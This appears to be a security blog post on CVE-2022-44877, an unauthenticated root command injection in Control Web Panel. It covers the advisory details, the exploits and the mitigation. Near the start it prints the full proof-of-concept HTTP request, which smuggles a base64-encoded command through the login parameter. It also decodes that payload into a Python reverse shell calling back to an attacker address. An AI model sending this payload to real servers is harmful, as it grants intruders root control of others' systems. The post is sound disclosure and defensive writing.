On November 7, 2022, a record was created in Mitre’s database, describing a critical CVSS 9.8 scoring vulnerability discovered in CWP7 (Control Web Panel) for CentOS. Due to improper neutralization of special elements (CWE-78), it allowed an unauthenticated attacker to execute arbitrary commands on the system as a root user by sending a specially crafted HTTP request to the login.php file.
The discovery of CVE-2022-44877 can be attributed to Numan Türle, who reported the issue to the Control Web Panel development team, and developed a proof-of-concept exploit for it.
Proof-Of-Concept
First, Numan uploaded this POC script on his GitHub account and Packet Storm.
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
That was an HTTP POST request with the Base64-encoded payload which when decoded, looks something like this:
python -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.13.37.11',1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn('/bin/bash')"
The purpose of this script is to establish a reverse shell for the attacker's machine.
The Exploits
One of the publicly available later-developed exploits targeting CVE-2022-44877 is a Metasploit module developed by Spencer McIntyre and Numan Türle, based on the original POC. This module automates the process of exploiting the vulnerability, making it easier for attackers to execute arbitrary commands on vulnerable Control Web Panel installations.
The exploit module utilizes an unauthenticated OS command injection technique. By sending a specially crafted HTTP request to the vulnerable server, an attacker can inject arbitrary operating system commands. The command execution occurs within the context of the root user, which further amplifies the impact of a successful exploit.
This module also supports different targets for exploiting the vulnerability, depending on the platform and architecture of the affected system. It includes a check function to verify if the target is vulnerable and an exploit function to execute the payload.
Another exploit targeting CVE-2022-44877 is a standalone Go script developed by Mayank Deshmukh. This script leverages the vulnerability to perform remote code.
The script utilizes the cURL command within the payload to execute arbitrary commands on the target system. By injecting the payload into the login.php script, the attacker can trigger the execution of the injected command. The script also allows the attacker to specify a listener IP and port for out-of-band callback communication. Both exploits mentioned above provide means for attackers to take advantage of this vulnerability and gain unauthorized access to CWP.
Affected Versions and Mitigation
Control Web Panel versions prior to 0.9.8.1147 are known to be affected by CVE-2022-44877. If you are using an earlier version, it is highly recommended to upgrade to the latest version immediately. The later versions include a security patch that addresses the vulnerability and mitigates the risk of exploitation.
Additionally, organizations should restrict access to the Control Web Panel: Limit access to the Control Web Panel to trusted IP addresses or through a secure virtual private network (VPN) to minimize the exposure to potential
Finally, Some Good News
You can rely on us to stay informed about the most recent security practices, standards, and significant news in the field of cybersecurity since we are always constantly scanning the web for the systems that are affected by some of the vulnerabilities that are most largely exploited in the wild.
If you have missed several security audits or lack confidence in your IT infrastructure's security, we invite you to register for our feed. By doing this, you may determine whether you run the risk of falling prey to these vulnerabilities.
Subscribe to be updated on the new content!